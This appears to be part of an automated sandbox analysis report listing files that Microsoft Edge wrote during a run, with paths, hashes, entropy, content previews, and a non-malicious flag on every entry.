                                                                                                                                                                                                                                                                                                                          SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                                          MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                                          SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                                          SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                                          SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):13
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                                          MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                                          SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                                          SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                                          SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090701653009998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM7wuF9hDO6vP6O+Htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEb6atbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:B1E33281FC96CFB88C007D0DEA609E34
                                                                                                                                                                                                                                                                                                                          SHA1:59410F20031946D787319DC6E1CDD9EA7EAD2F18
                                                                                                                                                                                                                                                                                                                          SHA-256:4C6618F86470F93A307C58567815A110CE827EF6E580DA251124BC7C9E0DCB67
                                                                                                                                                                                                                                                                                                                          SHA-512:4A172A5FAB051C8A1487EB6738C1BEC69E56206BD31AE3E74C38781348E727A3CE27E42E81C18385FB0980564BD009214C54EA2192E011E1EBA47150AC11BD19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF412e8.TMP (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090701653009998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM7wuF9hDO6vP6O+Htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEb6atbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:B1E33281FC96CFB88C007D0DEA609E34
                                                                                                                                                                                                                                                                                                                          SHA1:59410F20031946D787319DC6E1CDD9EA7EAD2F18
                                                                                                                                                                                                                                                                                                                          SHA-256:4C6618F86470F93A307C58567815A110CE827EF6E580DA251124BC7C9E0DCB67
                                                                                                                                                                                                                                                                                                                          SHA-512:4A172A5FAB051C8A1487EB6738C1BEC69E56206BD31AE3E74C38781348E727A3CE27E42E81C18385FB0980564BD009214C54EA2192E011E1EBA47150AC11BD19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41336.TMP (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090701653009998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM7wuF9hDO6vP6O+Htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEb6atbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:B1E33281FC96CFB88C007D0DEA609E34
                                                                                                                                                                                                                                                                                                                          SHA1:59410F20031946D787319DC6E1CDD9EA7EAD2F18
                                                                                                                                                                                                                                                                                                                          SHA-256:4C6618F86470F93A307C58567815A110CE827EF6E580DA251124BC7C9E0DCB67
                                                                                                                                                                                                                                                                                                                          SHA-512:4A172A5FAB051C8A1487EB6738C1BEC69E56206BD31AE3E74C38781348E727A3CE27E42E81C18385FB0980564BD009214C54EA2192E011E1EBA47150AC11BD19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4151a.TMP (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090701653009998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM7wuF9hDO6vP6O+Htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEb6atbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:B1E33281FC96CFB88C007D0DEA609E34
                                                                                                                                                                                                                                                                                                                          SHA1:59410F20031946D787319DC6E1CDD9EA7EAD2F18
                                                                                                                                                                                                                                                                                                                          SHA-256:4C6618F86470F93A307C58567815A110CE827EF6E580DA251124BC7C9E0DCB67
                                                                                                                                                                                                                                                                                                                          SHA-512:4A172A5FAB051C8A1487EB6738C1BEC69E56206BD31AE3E74C38781348E727A3CE27E42E81C18385FB0980564BD009214C54EA2192E011E1EBA47150AC11BD19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43c0b.TMP (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):44137
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.090701653009998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM7wuF9hDO6vP6O+Htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEb6atbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:B1E33281FC96CFB88C007D0DEA609E34
                                                                                                                                                                                                                                                                                                                          SHA1:59410F20031946D787319DC6E1CDD9EA7EAD2F18
                                                                                                                                                                                                                                                                                                                          SHA-256:4C6618F86470F93A307C58567815A110CE827EF6E580DA251124BC7C9E0DCB67
                                                                                                                                                                                                                                                                                                                          SHA-512:4A172A5FAB051C8A1487EB6738C1BEC69E56206BD31AE3E74C38781348E727A3CE27E42E81C18385FB0980564BD009214C54EA2192E011E1EBA47150AC11BD19
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                                          MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                                          SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                                          SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                                          SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):47
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                                          MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                                          SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                                          SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                                          SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                                          MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                                          SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                                          SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                                          SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):81
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                          MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                          SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                          SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                          SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):130439
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                          MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                          SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                          SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                          SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                          MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                                          SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                          SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                          SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):57
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                          MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                          SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                          SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                          SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

